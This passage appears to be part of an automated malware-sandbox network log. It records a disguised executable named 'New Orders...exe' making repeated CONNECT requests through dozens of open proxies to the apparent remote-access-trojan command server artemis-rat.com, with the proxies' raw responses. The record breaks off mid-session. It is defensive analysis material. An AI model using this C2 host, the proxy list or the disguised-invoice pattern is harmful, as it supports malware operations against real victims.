                                                                                        Mar 11, 2024 16:16:51.570513010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.570599079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.663738012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:21.773108006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:33.773205042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:57.773148060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1358192.168.2.954050159.89.138.130807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.473642111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.644814968 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.10.3 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1359192.168.2.95151241.111.198.108807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.473649025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.477448940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.570513964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.570497036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.663721085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:21.773108959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:33.773226976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:57.777364969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1360192.168.2.95201672.49.49.11310347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.476032019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1361192.168.2.951596103.69.87.14231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.476046085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.632528067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.000438929 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1362192.168.2.953957199.187.210.5441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.479449034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1363192.168.2.95184137.44.247.21731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.479450941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.477448940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.570528984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.570513964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.663748026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:21.775379896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:33.775542021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:57.777364969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1364192.168.2.954080104.19.83.128807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.481336117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.642443895 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1365192.168.2.953929123.126.158.50807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.481357098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1366192.168.2.953936103.190.54.141807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.481641054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1367192.168.2.951608134.209.105.20931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.482048988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.824393034 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1368192.168.2.95165545.11.95.16552147672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.482333899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1369192.168.2.954001194.4.50.94123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.482635975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1370192.168.2.954092104.16.107.206807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.482858896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.642532110 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1371192.168.2.95395143.231.22.228807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.483966112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.902715921 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1372192.168.2.95407935.190.107.16300007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.484198093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1373192.168.2.95195166.29.131.58308857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.485524893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.632735014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.633152008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.633232117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.642389059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:21.743478060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1374192.168.2.951881162.214.225.223434357672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.485666990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.632666111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.632841110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.633191109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.642447948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:33.648128986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:21.663805962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1375192.168.2.953970185.164.163.13581187672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.486181974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.312087059 CET132INHTTP/1.1 503 Too many open connections
                                                                                        Content-Type: text/plain
                                                                                        Connection: close
                                                                                        Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                        Data Ascii: Maximum number of open connections reached.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1376192.168.2.95398492.205.61.38360737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.486241102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.273236990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.164805889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
